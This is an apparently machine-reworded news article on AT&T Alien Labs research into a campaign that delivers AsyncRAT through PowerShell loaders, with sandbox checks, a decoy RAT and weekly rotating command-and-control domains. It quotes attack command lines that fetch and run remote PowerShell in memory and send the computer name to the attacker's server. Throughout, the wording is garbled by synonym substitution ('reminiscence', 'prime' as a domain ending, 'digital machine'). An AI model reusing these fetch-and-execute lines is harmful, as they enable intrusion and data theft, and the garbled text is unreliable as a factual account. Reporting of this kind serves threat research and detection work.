The payload is one other encoded script written in PowerShell that’s executed straight in reminiscence with out being saved to disk with a “conhost –headless powershell iex(curl -useb sduyvzep[.]prime/1.php?hash=)” command. The area of the C&C server is rotated periodically.
The PowerShell script executes one more PowerShell script by invoking the iex(curl -useb “http://sduyvzep[.]prime/2.php?id=$env:computername&key=$wiqnfex”) command. This sends some data to the C&C server equivalent to the pc hostname and a variable referred to as $wiqnfex that signifies the probability of the pc being a digital machine or sandbox. This worth is ready after the primary performs a number of checks for the system’s graphics card adapter and BIOS, which might be emulated in a VM.
If the C&C server determines the $wiqnfex signifies a sound goal, the server deploys AsyncRAT. If the variable worth signifies a doable VM or sandbox, it redirects the request to Google or to a distinct PowerShell script that downloads and launches a decoy RAT.
“When decompiled, the RAT is definitely a distraction for any researchers trying into the marketing campaign,” the Alien Lab researchers stated. “The pattern is a decoy made to resemble a RAT for a number of causes. The meeting identify is DecoyClient, and the configuration isn’t encrypted as it might be in an AsyncRAT pattern. Moreover, the pattern doesn’t include a C&C server, solely loopback addresses. Moreover, among the many information to be exfiltrated to the C&C, is the string ‘LOL’ or the group ‘GOVNO’.”
A brand new command-and-control area each week
Along with frequently randomizing the script code and malware samples to evade detection, the attackers additionally rotate the C&C domains each week. Nevertheless, the Alien Lab researchers managed to reverse-engineer the area era algorithm, which along with a number of different constants such because the TLD (.prime), registrar, and group identify used to register the domains, and had been capable of finding the domains used prior to now and procure previous samples of the deployment scripts.
“These domains have been noticed to hold the identical options as talked about earlier than, with the distinction of being 15 characters lengthy,” the researchers stated. “This permits us to pivot and discover historic samples primarily based off the DGA, in addition to construct detections to determine future infrastructure regardless of all their efforts to evade EDR and static detections.” The AT&T Alien Labs report consists of detection signatures for this marketing campaign that can be utilized with the open-source Suricata intrusion detection system in addition to a listing of indicators of compromise (IOC) that can be utilized to construct detections for different techniques.
